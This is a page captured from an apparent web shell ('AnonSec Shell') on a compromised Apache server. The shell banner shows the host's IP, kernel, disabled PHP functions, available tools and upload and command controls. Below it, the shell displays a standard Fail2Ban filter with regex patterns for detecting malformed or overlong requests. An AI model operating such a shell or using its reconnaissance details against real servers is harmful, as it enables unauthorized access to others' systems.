AnonSec Shell
Server IP : 185.86.78.101  /  Your IP : 216.73.216.213
Web Server : Apache
System : Linux 675867-vds-valikoshka1996.gmhost.pp.ua 5.4.0-150-generic #167-Ubuntu SMP Mon May 15 17:35:05 UTC 2023 x86_64
User : www ( 1000)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /proc/self/root/etc/fail2ban/filter.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     

Current File : /proc/self/root/etc/fail2ban/filter.d/apache-overflows.conf
# Fail2Ban filter to block web requests on a long or suspicious nature
#

[INCLUDES]

# overwrite with apache-common.local if _apache_error_client is incorrect.
before = apache-common.conf

[Definition]

failregex = ^%(_apache_error_client)s (?:(?:AH0013[456]: )?Invalid (method|URI) in request\b|(?:AH00565: )?request failed: URI too long \(longer than \d+\)|request failed: erroneous characters after protocol string:|(?:AH00566: )?request failed: invalid characters in URI\b)

ignoreregex =

# DEV Notes:
#
# [sebres] Because this apache-log could contain very long URLs (and/or referrer), 
#          the parsing of it anchored way may be very vulnerable (at least as regards 
#          the system resources, see gh-1790). Thus rewritten without end-anchor ($).
# 
# fgrep -r 'URI too long' httpd-2.*
#   httpd-2.2.25/server/protocol.c:                          "request failed: URI too long (longer than %d)", r->server->limit_req_line);
#   httpd-2.4.4/server/protocol.c:                              "request failed: URI too long (longer than %d)",
#
# fgrep -r 'in request' ../httpd-2.* | fgrep Invalid
#   httpd-2.2.25/server/core.c:                     "Invalid URI in request %s", r->the_request);
#   httpd-2.2.25/server/core.c:                          "Invalid method in request %s", r->the_request);
#   httpd-2.2.25/docs/manual/rewrite/flags.html.fr:avertissements 'Invalid URI in request'.
#   httpd-2.4.4/server/core.c:                     "Invalid URI in request %s", r->the_request);
#   httpd-2.4.4/server/core.c:                              "Invalid method in request %s - possible attempt to establish SSL connection on non-SSL port", r->the_request);
#   httpd-2.4.4/server/core.c:                              "Invalid method in request %s", r->the_request);
#
# fgrep -r 'invalid characters in URI' httpd-2.*
#   httpd-2.4.4/server/protocol.c:                              "request failed: invalid characters in URI");
#
# http://svn.apache.org/viewvc/httpd/httpd/trunk/server/core.c?r1=739382&r2=739620&pathrev=739620
#   ...possible attempt to establish SSL connection on non-SSL port
#
# https://wiki.apache.org/httpd/ListOfErrors
# Author: Tim Connors

Anon7 - 2022
AnonSec Team